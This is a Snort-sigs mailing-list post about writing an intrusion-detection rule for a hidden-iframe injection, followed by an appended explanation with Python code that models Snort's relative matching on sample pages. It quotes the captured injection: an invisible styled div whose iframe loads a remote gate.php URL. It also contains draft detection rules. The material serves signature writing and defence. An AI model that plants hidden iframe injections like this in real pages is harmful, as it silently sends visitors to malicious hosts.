[Snort-sigs] Rule thought

James Lay jlay at ...3266...
Mon Aug 6 14:13:28 EDT 2012


All,

Recently (today) I ran into the below:

<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div 
class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673   
frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 
border=0></iframe></div><!--/qpi-->

I've not seen an iframe injection that included a specified class 
before.  My original draft rule looked like:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
(msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data; 
pcre:"/<\/style><div class=[a-z]{9}><iframe src/i"; 
classtype:web-application-attack; sid:10000017; rev:1;)

But this looks pretty expensive.  I'm sure there's a better way to 
match this...would it be something like:

content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe src";

My question is how do I tell Snort to match all three consecutively?  I 
get that I could use within, but would that apply to the pcre?  Thanks 
for any advice.

James
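The way to make the three matches consecutive in Snort is to chain them with relative modifiers: `distance`/`within` on a `content` are measured from the end of the previous match, and a `pcre` with the `R` flag (anchored with `^`) is evaluated from that same cursor and, on success, moves the cursor to the end of its own match, so a following `content` with `within` is relative to the pcre. The Python below is an added example, not code from the original post or from the Snort project: it models that cursor behaviour as documented in the Snort manual and runs it over a constructed copy of the injected HTML plus two pages that should not alert. The candidate Snort rule in the comment is an assumption about the rule grammar and has not been run against Snort; the sample pages are constructed.

```python
import re

# Constructed samples (not captured traffic): the injected snippet from the
# post flattened onto one line, a benign page with a 7-letter class, and a
# page where the iframe is too far from the div to count as the same injection.
INJECTED = ('<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;}</style>'
            '<div class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673 '
            'frameborder=0 width=5 height=5></iframe></div><!--/qpi-->')
BENIGN = ('<style>div.sidebar{float:left}</style><div class=sidebar>'
          '<p>hello</p><iframe src=/ads.html></iframe></div>')
TOO_FAR = ('<style>x{}</style><div class=abcdefghi>'
           '<p>some unrelated content here</p><iframe src=/x.html></iframe>')

# Candidate rule this model follows (assumed syntax, untested against Snort):
#   alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (
#     msg:"INDICATOR-COMPROMISE div class iframe in page";
#     flow:to_client,established; file_data;
#     content:"</style><div class="; nocase;
#     pcre:"/^[a-z]{9}>/Ri";
#     content:"<iframe src"; within:40; nocase;
#     classtype:web-application-attack; sid:10000017; rev:2;)


class Cursor:
    """Position of the end of the last successful match, the point that
    distance/within and pcre's R flag are measured from."""

    def __init__(self, buf):
        self.buf = buf
        self.pos = 0


def content(cur, pattern, distance=0, within=None, nocase=False):
    """Model of a content match: search starts `distance` bytes after the
    cursor; with `within`, the whole pattern must fall inside the next
    `within` bytes. On success the cursor moves to the end of the match."""
    start = cur.pos + distance
    end = len(cur.buf) if within is None else start + within
    hay, needle = cur.buf[start:end], pattern
    if nocase:
        hay, needle = hay.lower(), needle.lower()
    i = hay.find(needle)
    if i < 0:
        return False
    cur.pos = start + i + len(pattern)
    return True


def pcre(cur, regex, flags=0):
    """Model of pcre with the R flag: the subject starts at the cursor, so
    '^' anchors there (Python's re needs the slice for that, since '^' with a
    start offset still means the real start of the string). A match moves the
    cursor to its end, so later relative contents are measured from it."""
    m = re.compile(regex, flags).search(cur.buf[cur.pos:])
    if not m:
        return False
    cur.pos += m.end()
    return True


def rule_matches(page):
    """All three options must succeed in order, each relative to the last."""
    cur = Cursor(page)
    return (content(cur, '</style><div class=', nocase=True)
            and pcre(cur, r'^[a-z]{9}>', re.I)
            and content(cur, '<iframe src', within=40, nocase=True))


if __name__ == '__main__':
    for name, page in (('injected', INJECTED), ('benign', BENIGN), ('too_far', TOO_FAR)):
        print(f'{name}: {"ALERT" if rule_matches(page) else "no match"}')
```

The first `content` is the only non-relative option and is the one Snort will use as the fast-pattern candidate; putting the longest literal there keeps the pcre off the hot path, which was the cost concern with the single-pcre draft.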
